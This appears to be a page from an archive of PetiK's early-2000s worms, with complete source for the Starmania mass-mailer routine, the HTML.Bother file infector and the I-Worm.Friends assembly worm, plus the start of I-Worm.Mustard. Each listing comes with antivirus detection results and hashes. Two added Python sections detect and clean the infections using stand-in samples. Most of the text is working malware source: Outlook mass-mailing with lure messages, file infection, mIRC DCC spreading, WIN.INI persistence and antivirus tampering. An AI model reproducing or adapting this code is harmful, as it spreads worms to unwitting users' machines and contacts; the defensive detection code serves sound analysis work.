w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.pandasoftware.com"
elseif lot = 3 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"
elseif lot = 4 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cia.gov"
elseif lot = 5 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.fbi.gov"
End If
End Sub
Sub Email()
Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
Randomize
num=Int((3*Rnd)+1)
Set c = f.GetFile(WScript.ScriptFullName)

If num = 1 then
c.Copy(fso.GetSpecialFolder(0)&"\NewPic__Cool.jpg.vbs")
go.Subject = "New Picture for you !"
go.Body = "Look at this nice picture attached"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"NewPic__Cool.jpg.vbs")

elseif num = 2 then


c.Copy(fso.GetSpecialFolder(0)&"\LoveFix.vbs")
go.Subject = "LoveLetter Fix"
go.Body = "Protect you against VBS.LoveLetter.Variant"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"LoveFix.vbs")

elseif num = 3 then


c.Copy(fso.GetSpecialFolder(0)&"\Win_A_Holiday.vbs")
go.Subject = "How to win a holiday in Paris"
go.Body = "Play at this game attached and win a holiday in Paris"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Win_A_Holiday.vbs")
End If
If go.To <> "" Then
go.Send
End If
Next
End If
Next
End Sub
#-------------------- END OF CODE --------------------#
File Starmania.vbs received on 05.16.2009 19:40:56 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 IRC-Worm.VBS.Generic!IK
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 VBS/Starmania.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.Generic
Authentium 5.1.2.4 2009.05.16 VBS/StarMania.A@m
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.E9844292
CAT-QuickHeal 10.00 2009.05.15 VBS/StarMania.A
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 IRC-Worm.VBS.Generic
DrWeb 5.0.0.12182 2009.05.16 modification of VBS.Merlin
eSafe 7.0.17.0 2009.05.14 VBS.Petick.
eTrust-Vet 31.6.6508 2009.05.16 VBS/VBSWG!generic
F-Prot 4.4.4.56 2009.05.16 VBS/StarMania.A@m
F-Secure 8.0.14470.0 2009.05.15 IRC-Worm.VBS.Generic
Fortinet 3.117.0.0 2009.05.16 VBS/StarMania.A@mm
GData 19 2009.05.16 Generic.ScriptWorm.E9844292
Ikarus T3.1.1.49.0 2009.05.16 IRC-Worm.VBS.Generic
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.VBS.Generic
McAfee 5616 2009.05.15 VBS/Chism
McAfee+Artemis 5616 2009.05.15 VBS/Chism
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Starmania.1
Microsoft 1.4602 2009.05.16 Virus:VBS/Lofix
NOD32 4080 2009.05.15 probably unknown SCRIPT
Norman 6.01.05 2009.05.16 mIRC/Gen_VBS
nProtect 2009.1.8.0 2009.05.16 VBS.Holiday.A@mm
Panda 10.0.0.14 2009.05.16 VBS/Starmania
PCTools 4.4.2.0 2009.05.16 VBS.Starma.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Starmania
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.ManiaStar.A@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_GENERIC.009
VBA32 3.12.10.5 2009.05.16 IRC-Worm.VBS.Generic
ViRobot 2009.5.15.1737 2009.05.15 -

Additional information
File size: 4566 bytes
MD5...: db45536af4e9a1debccb73111fce3f3f
SHA1..: d8dfd047f7ccfba137bd3932c6495d7c0fc88d2e
<!--
Name : HTML.Bother
Author : PetiK
Language : HTML/VBS

' It creates on the desktop a file "Hello.txt" with this message :

"HTML.Bother by PetiK (06/05/2001)"
"A HTML.Worm made in France"
' Creates %SYSDIR%\PetiK.htm and sets it as the Internet Explorer start page
' (the previous start page is loaded inside an IFRAME)
' It infects HTM and HTML files in the Personal (My Documents) directory and %WINDIR%\WEB

-->

<bother>
<html><head><title>Patch for Internet Explorer</title></head>
<body bgColor=#ffffff>
<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see
this page.
<br>Please open this page again and click accept ActiveX.<br>Internet Explorer</font>

<SCRIPT Language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
bureau=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
Set txt=fso.CreateTextFile(bureau&"\Hello.txt")
txt.WriteLine "HTML.Bother by PetiK (06/05/2001)"
txt.WriteLine "A HTML.Worm made in France"
txt.Close

start=ws.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page")
If start <> fso.GetSpecialFolder(1)&"\PetiK.htm" Then
Set htm=fso.CreateTextFile(fso.GetSpecialFolder(1)&"\PetiK.htm",2)
htm.WriteLine ("<html><head><title>HTML.Bother</title>")
htm.WriteLine ("<body><IFRAME SRC='"+start+"'></IFRAME>")
htm.WriteLine ("<font face='verdana' color=blue size='2'>")
htm.WriteLine ("<br><br>Hi, you have my Worm.")
htm.WriteLine ("<br>It's not dangerous.")
htm.WriteLine ("<br>Contact Symantec Corporation (www.symantec.com/avcenter) to disinfect your computer")
htm.WriteLine ("</body></html>")
htm.Close
ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page",fso.GetSpecialFolder(1)&"\PetiK.htm"
End If

p = Int(Rnd * 30) + 1
If Day(Now()) = p Then
WshShell.RegWrite "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon\",fso.GetSpecialFolder(1)&"\SHELL32.dll,69"
End If

doc=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
Set FolderObj = FSO.GetFolder(doc)
Set FO = FolderObj.Files
For each cible in FO
ExtName = lcase(FSO.GetExtensionName(cible.Name))
if ExtName = "htm" or ExtName = "html" Then
Set vrai = fso.OpenTextFile(cible.path, 1, False)
if vrai.readline <> "<bother>" Then
vrai.close()
Set vrai = fso.OpenTextFile(cible.path, 1, False)
htmorg = vrai.ReadAll()
vrai.close()
Set virus = document.body.createTextRange
Set vrai = fso.CreateTextFile(cible.path, True, False)
vrai.WriteLine "<bother>"
vrai.Write(htmorg)
vrai.WriteLine "<bother par PetiK May 9th 2001>"
vrai.WriteLine virus.htmltext
vrai.Close()
else
Real.close()
end if
end if
next

Set FolderObj = FSO.GetFolder(fso.GetSpecialFolder(0)&"\WEB")
Set FO = FolderObj.Files
For each cible in FO
ExtName = lcase(FSO.GetExtensionName(cible.Name))
if ExtName = "htm" or ExtName = "html" Then
Set vrai = fso.OpenTextFile(cible.path, 1, False)
if vrai.readline <> "<bother>" Then
vrai.close()
Set vrai = fso.OpenTextFile(cible.path, 1, False)
htmorg = vrai.ReadAll()
vrai.close()
Set virus = document.body.createTextRange
Set vrai = fso.CreateTextFile(cible.path, True, False)
vrai.WriteLine "<bother>"
vrai.Write(htmorg)
vrai.WriteLine "<bother par PetiK May 9th 2001>"
vrai.WriteLine virus.htmltext
vrai.Close()
else
Real.close()
end if
end if
next

</SCRIPT>
</body>
</html>
File Bother.htm received on 05.16.2009 11:20:32 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Both!IK
AhnLab-V3 5.0.0.2 2009.05.15 HTML/Bother
AntiVir 7.9.0.168 2009.05.15 VBS/Both
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.15 VBS/Both.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Bother.A
BitDefender 7.2 2009.05.16 VBS.Both.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Both.A
ClamAV 0.94.1 2009.05.15 VBS.Startpage-1
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Bother
eSafe 7.0.17.0 2009.05.14 Virus.VBS.Both
eTrust-Vet 31.6.6508 2009.05.16 VBS/Both
F-Prot 4.4.4.56 2009.05.15 VBS/Both.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Both
Fortinet 3.117.0.0 2009.05.16 VBS/Both.A
GData 19 2009.05.16 VBS.Both.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Both
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Both
McAfee 5616 2009.05.15 VBS/Bother
McAfee+Artemis 5616 2009.05.15 VBS/Bother
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Both
Microsoft 1.4602 2009.05.16 Virus:VBS/SYSID
NOD32 4080 2009.05.15 VBS/Bother
Norman 6.01.05 2009.05.16 VBS/Both.K
nProtect 2009.1.8.0 2009.05.16 VBS.Both.A
Panda 10.0.0.14 2009.05.15 Univ.A
PCTools 4.4.2.0 2009.05.15 VBS.Bother.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.HTML.Both
Sophos 4.41.0 2009.05.16 VBS/Bother
Sunbelt 3.2.1858.2 2009.05.16 Virus.VBS.Both (v)
Symantec 1.4.4.12 2009.05.16 VBS.Bother.3180
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_BOTHER.A
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Both
ViRobot 2009.5.15.1737 2009.05.15 VBS.Both
VirusBuster 4.6.5.0 2009.05.15 VBS.Bother.A

Additional information
File size: 3255 bytes
MD5...: 915aaf9b61f0d62c1fc2082198b324be
SHA1..: e2bf913ffca85e796ecef0564a896625dc748332
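Detection and clean-up for the two file infectors above, VBS.Starmania (which prepends its own text to *.vbs and *.vbe files) and HTML.Bother (which wraps *.htm and *.html files), as an added example that is not part of PetiK's archive. It relies only on the markers the listings show being written: the 14-byte `'VBS.Starmania` prefix that `ptk()` tests, and Bother's `<bother>` first line plus the `<bother par PetiK May 9th 2001>` separator. The worm, host and script strings inside the block are constructed stand-ins carrying the same markers, not the real code.

```python
"""Recognise, and where the layout allows undo, the two file infections above.

Added example for this archive, not PetiK's code. It uses only the markers the
infectors write. The sample strings are constructed stand-ins, not the worms.
"""
import re
from typing import Optional, Tuple

STARMANIA_MARK = "'VBS.Starmania"                  # ptk() compares VF.Read(14) to this
BOTHER_HEAD = "<bother>"                           # first line of an infected HTM/HTML
BOTHER_SEP = "<bother par PetiK May 9th 2001>"     # written between host and script

SUB_EMAIL_RE = re.compile(r"^\s*Sub\s+Email\s*\(\s*\)\s*$", re.IGNORECASE)
END_SUB_RE = re.compile(r"^\s*End\s+Sub\s*$", re.IGNORECASE)


def is_starmania_infected(text: str) -> bool:
    return text.startswith(STARMANIA_MARK)


def strip_starmania(text: str) -> Optional[str]:
    """Remove the leading worm copy and return what follows it.

    The worm prepends vbsworm = ReadAll of whatever script was running. Its own
    text ends with the 'End Sub' that closes Sub Email(), so cut there. Caveat:
    if the running script was itself an infected host, vbsworm also carried that
    host's body, and what comes back is two hosts glued together. Treat the
    result as evidence, not a restored file, unless its size matches a known-good
    copy.
    """
    if not is_starmania_infected(text):
        return None
    lines = text.splitlines(keepends=True)
    in_email = False
    for i, line in enumerate(lines):
        if SUB_EMAIL_RE.match(line):
            in_email = True
        elif in_email and END_SUB_RE.match(line):
            return "".join(lines[i + 1:])
    return None                                    # marker present, body not recognised


def is_bother_infected(text: str) -> bool:
    first = text.split("\n", 1)[0].rstrip("\r")
    return first == BOTHER_HEAD


def clean_bother(text: str) -> Optional[Tuple[str, str]]:
    """Return (original_document, injected_script) for an infected file.

    Layout written by the infector: "<bother>" + CRLF, the original bytes with
    nothing added (Write, not WriteLine), the separator line, then the script.
    The original is therefore exactly the slice between the first line break
    and the separator.
    """
    if not is_bother_infected(text) or "\n" not in text:
        return None
    body = text.split("\n", 1)[1]
    idx = body.find(BOTHER_SEP)
    if idx < 0:
        return None                                # marker present, layout unexpected
    original = body[:idx]
    script = body[idx + len(BOTHER_SEP):].lstrip("\r\n")
    return original, script


def classify(name: str, text: str) -> Optional[str]:
    """Dispatch on the extensions each infector targets."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext in ("vbs", "vbe") and is_starmania_infected(text):
        return "VBS.Starmania"
    if ext in ("htm", "html") and is_bother_infected(text):
        return "HTML.Bother"
    return None


# Constructed stand-ins: same markers and closing structure, none of the worm code.
FAKE_WORM = ("'VBS.Starmania\r\n"
             "' constructed stub, not the worm\r\n"
             "Sub Email()\r\n"
             "End Sub\r\n")
HOST_VBS = 'MsgBox "hello from the host script"\r\n'
INFECTED_VBS = FAKE_WORM + HOST_VBS

HOST_HTML = "<html><body><p>constructed host page</p></body></html>\r\n"
FAKE_SCRIPT = "<SCRIPT Language=VBScript>' constructed stub</SCRIPT>\r\n"
INFECTED_HTML = BOTHER_HEAD + "\r\n" + HOST_HTML + BOTHER_SEP + "\r\n" + FAKE_SCRIPT

if __name__ == "__main__":
    print(classify("host.vbs", INFECTED_VBS), repr(strip_starmania(INFECTED_VBS)))
    print(classify("page.htm", INFECTED_HTML), clean_bother(INFECTED_HTML)[0])
```

Bother can be undone mechanically because the infector brackets the host between two markers; Starmania cannot, because what it prepends is whatever file it was launched from, so a second-generation infection carries the first host inside it. That asymmetry is the reason to keep detection and repair as separate functions and to compare any repaired file against a known-good size or hash before putting it back.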
comment #
Name : I-Worm.Friends
Author : PetiK
Date : May 13th - May 15th 2001
Action : This worm uses a VBS script and Microsoft Outlook to spread. It copies itself to
%SYSTEM%\Iesetup.exe. WIN.INI is modified with run=%SYSTEM%\Iesetup.exe in the [windows] section.
It writes a mIRC script to %WINDIR%\petik and copies it to C:\mirc and C:\mirc32 as script.ini.
On first run it shows a fake WinZip error message box.
The worm creates C:\Friends and writes the file maya.vbs there, which does the mailing.
It changes the values under HKLM\Software\Microsoft\Windows\CurrentVersion :
RegisteredOwner : Maya, Laurent, Etienne
RegisteredOrganization : PetiK Corporation
On the 5th of every month, it shows a message box.
#

.386
jumps
locals
.model flat,stdcall

;KERNEL32.dll
extrn WritePrivateProfileStringA:PROC
extrn lstrcat:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC

;USER32.dll
extrn MessageBoxA:PROC

;ADVAPI32.dll
extrn RegOpenKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC

.data
szOrig db 50 dup (0)
szPTK db 50 dup (0)
szWin db 50 dup (0)
FileHandle dd ?
RegHandle dd ?
octets dd ?
winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
Copie db "\Iesetup.exe",00h
inifile db "\petik",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
VBS db "C:\Friends\maya.vbs",00h
DIR db "C:\Friends",00h
OWN_D db "RegisteredOwner",00h
OWN_S db "Maya, Laurent, Etienne",00h
ORG_D db "RegisteredOrganization",00h
ORG_S db "PetiK Corporation",00h
SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h
TITRE db "WinZip Self-Extractor",00h
TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error",00h
TITRE2 db "I-Worm.Friends",00h
TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah
db "",0dh,0ah
db "To my friends Maya and Laurent",00h
email db "wscript C:\Friends\maya.vbs",00h
FILE_ATTRIBUTE_READONLY equ 00000001h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
HKEY_LOCAL_MACHINE equ 80000002h
KEY_SET_VALUE equ 00000002h
REG_SZ equ 00000001h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>

petikd: db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",00h
PETIKTAILLE equ $-petikd

mayad:
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe", fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Next',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah
db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
MAYATAILLE equ $-mayad
.code
DEBUT:
PREPAR: push 50
push offset szCopie
call GetSystemDirectoryA
push offset Copie
push offset szCopie
call lstrcat
FILE: push 50 ; Create PetiK in \%WINDIR%, a mIRC script
push offset szPTK
call GetWindowsDirectoryA
push offset inifile
push offset szPTK
call lstrcat
push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset szPTK ; success ? continue
call CreateFileA
cmp eax,-1
je BDR ; or else, jump to label BDR
mov [FileHandle],eax
push 00h
push offset octets
push PETIKTAILLE
push offset petikd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle ; the file is create

MIRC: push 00h
push offset script1
push offset szPTK
call CopyFileA ; copy the file to C:\mirc
push 00h
push offset script2
push offset szPTK
call CopyFileA ; and C:\mirc32

EMAIL: push 00h
push offset DIR
call CreateDirectoryA ; Create the directory C:\Friends
push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_ALWAYS
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset VBS
call CreateFileA ; and put the VBS file maya.vbs
mov [FileHandle],eax
push 00h
push offset octets
push MAYATAILLE
push offset mayad
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle

ENVOIE: push 01h
push offset email
call WinExec ; run this file

COPIE: push 00h
call GetModuleHandleA
push 50
push offset szOrig
push eax
call GetModuleFileNameA
push 00h
push offset szCopie
push offset szOrig
call CopyFileA ; Copy our file to \%SYSTEM%\Iesetup.exe
WIN_INI:push 50h
push offset szWin
call GetWindowsDirectoryA
push offset winini
push offset szWin
call lstrcat
push offset szWin ; Write to WIN.INI file in run section
push offset szCopie ; [windows]
push offset run ; run=\%SYSTEM%\Iesetup.exe
push offset windows
call WritePrivateProfileStringA
MESS: push 10h ; Show the fake error message
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
BDR: push offset RegHandle
push KEY_SET_VALUE
push 00h
push offset SOUS_CLE
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA

push 02h
push offset OWN_D
push offset REG_SZ
push 00h
push offset OWN_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Owner
push 02h
push offset ORG_D
push offset REG_SZ
push 00h
push offset ORG_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Organization

push [RegHandle]
call RegCloseKey

DATE: push offset SystemTime
call GetSystemTime
cmp [SystemTime.wDay],05h ; 5th of the month ?
jne FIN
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
call MessageBoxA ; Show a messagebox

FIN: push 00h
call ExitProcess

end DEBUT
File Friends.exe received on 05.16.2009 11:58:15 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.6656
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.15
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.15 W32/Malware!543d
Avast 4.8.1335.0 2009.05.15 Win32:PetiK-Friends
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Generic.Malware.IM.34A9CFBA
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.B
ClamAV 0.94.1 2009.05.15 W32.PetTick
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.6656
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6656.A
F-Prot 4.4.4.56 2009.05.15 W32/Malware!543d
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.B@mm
GData 19 2009.05.16 Generic.Malware.IM.34A9CFBA
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.15
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.B
NOD32 4080 2009.05.15 Win32/Petik.B
Norman 6.01.05 2009.05.16 W32/Pet_Tick.6656.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6656.C
Panda 10.0.0.14 2009.05.16 W32/Petik.B
PCTools 4.4.2.0 2009.05.15 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.v
Sophos 4.41.0 2009.05.16 W32/Petik-B
Sunbelt 3.2.1858.2 2009.05.16 Friends worm
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.B
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.6656.A
VirusBuster 4.6.5.0 2009.05.15 VBS.LoveLetter
Additional information
File size: 6656 bytes
MD5...: 18651c3df28058b96d1297d1568d4fd8
SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8
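Every worm in this part of the archive drops a mIRC `script.ini` whose JOIN handler DCC-sends a file to each joiner (Bastille, Starmania, Friends, Mustard), and the two Win32 ones persist through the `run=` line of the `[windows]` section of WIN.INI. The Python below is an added example for this page, not code from the archive: it parses a `script.ini` into handlers and reports the ones that send files to `$nick`, lists commands that change the client's DCC request handling (`sreq`/`creq`), and lists the autostart entries of a WIN.INI. The script text in the samples is copied from the Bastille and Starmania listings above; the WIN.INI sample is constructed.

```python
"""Hunt for the host-side footprints the worms in this archive share.

Added example for this archive, not PetiK's code. Checks a mIRC script.ini for
handlers that DCC-send a file to whoever joins, for DCC request-policy changes,
and a WIN.INI [windows] section for run=/load= autostart lines.
"""
import re
from typing import Dict, List, Tuple

HANDLER_RE = re.compile(r"on\s+\d+:(?P<event>[A-Za-z]+):", re.IGNORECASE)
# '/dcc', '.dcc', '/.dcc' and './dcc' all occur in the listings above.
DCC_SEND_RE = re.compile(r"[./]*dcc\s+send\s+\$nick\s+(?P<path>[^\s}]+)", re.IGNORECASE)
DCC_POLICY_RE = re.compile(r"\b([sc]req\s+\w+)", re.IGNORECASE)


def script_lines(ini_text: str) -> List[str]:
    """Values of the nN= keys in the [script] section, in file order."""
    out, in_script = [], False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        m = re.match(r"n\d+=(.*)", line)
        if in_script and m:
            out.append(m.group(1))
    return out


def mirc_findings(ini_text: str) -> List[Dict[str, object]]:
    """Handlers that DCC-send a file to $nick: the event name and the paths sent."""
    body = "\n".join(script_lines(ini_text))
    starts = list(HANDLER_RE.finditer(body))
    findings: List[Dict[str, object]] = []
    for i, h in enumerate(starts):
        end = starts[i + 1].start() if i + 1 < len(starts) else len(body)
        chunk = body[h.start():end]                # one handler, up to the next 'on N:'
        paths = [m.group("path") for m in DCC_SEND_RE.finditer(chunk)]
        if paths:
            findings.append({"event": h.group("event").lower(), "sends": paths})
    return findings


def dcc_policy_changes(ini_text: str) -> List[str]:
    """Commands that alter how the client answers DCC send (sreq) or chat (creq) requests."""
    return [m.group(1) for line in script_lines(ini_text)
            for m in DCC_POLICY_RE.finditer(line)]


def winini_autostart(ini_text: str) -> List[Tuple[str, str]]:
    """run= and load= values under [windows]; both start programs at logon on Win9x."""
    out, section = [], None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "windows" and "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            if key.lower() in ("run", "load") and value:
                out.append((key.lower(), value))
    return out


# Copied from the Bastille listing above.
SAMPLE_BASTILLE_INI = r"""[script]
n0=on 1:start:{
n1= .sreq ignore
n2=}
n3=on 1:connect:/rename C:\Win32.com C:\Bastille.com
n4=on 1:join:#:{
n5=if ($nick != $me) { dcc send $nick C:\Bastille.com }
n6=}
n7=on 1:disconnect:/rename C:\Bastille.com C:\Win32.com
"""

# Copied from the Starmania listing above, with the Windows folder filled in.
SAMPLE_STARMANIA_INI = r"""[script]
n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n1= /dcc send $nick C:\WINDOWS\Hwinfo.vbs
n2=}
"""

# Constructed WIN.INI, as I-Worm.Friends would leave it.
SAMPLE_WININI = r"""[windows]
load=
run=C:\WINDOWS\SYSTEM\Iesetup.exe
NullPort=None
[Desktop]
Wallpaper=(None)
"""

if __name__ == "__main__":
    print(mirc_findings(SAMPLE_BASTILLE_INI), dcc_policy_changes(SAMPLE_BASTILLE_INI))
    print(mirc_findings(SAMPLE_STARMANIA_INI))
    print(winini_autostart(SAMPLE_WININI))
```

A JOIN handler that sends a file is the actual indicator; a `script.ini` by itself is not, since legitimate scripts use the same file. Splitting the body per handler keeps a benign `on 1:text` that happens to mention `dcc` from being reported alongside the spreading hook, and the `run=` check is worth keeping on any Win9x-era image because the line is easy to overlook next to the registry Run keys.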
comment #
Name : I-Worm.Mustard
Author : PetiK
Date : May 10th - 27th
Size : 7168 bytes
Action : When the worm is first executed, it creates the key HKCU\Software\[PetiK].
It then copies itself to %WINDIR%\AVUpdate.exe and alters the run= line of the [windows]
section in WIN.INI to run=%WINDIR%\AVUpdate.exe. It drops a mIRC script.ini into
C:\mirc, C:\mirc32 and the same folders under C:\Program Files. It tries to delete the
"Norton Auto-Protect" value from the Run key of the registry. If that succeeds, it appends
a record starting with "*.vbs" to Norton AntiVirus's Exclude.dat, intended to keep VBS
files from being scanned, shows a message box and reboots the computer. On the next start
(the key already exists) it creates C:\send.vbs with the "readonly" and "hidden"
attributes, runs it to mail AVUpdate.exe with Outlook, and deletes it after ten seconds.
On June 17th, it shows a message box (as written, the date test compares wDay twice
instead of wDay and wMonth, so the message never appears).
#

.386
jumps
locals
.model flat,stdcall

extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn ExitWindowsEx:PROC
extrn GetFileAttributesA:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn lstrcat:PROC
extrn MessageBoxA:PROC
extrn RegCreateKeyExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegDeleteValueA:PROC
extrn RegQueryValueExA:PROC
extrn RegCloseKey:PROC
extrn SetFileAttributesA:PROC
extrn SetFilePointer:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn WritePrivateProfileStringA:PROC

.data
FileHandle dd ?
RegHandle dd ?
octets dd ?
regDisp dd 0
regResu dd 0
Dist dd 0
szNOR db 50 dup (0)
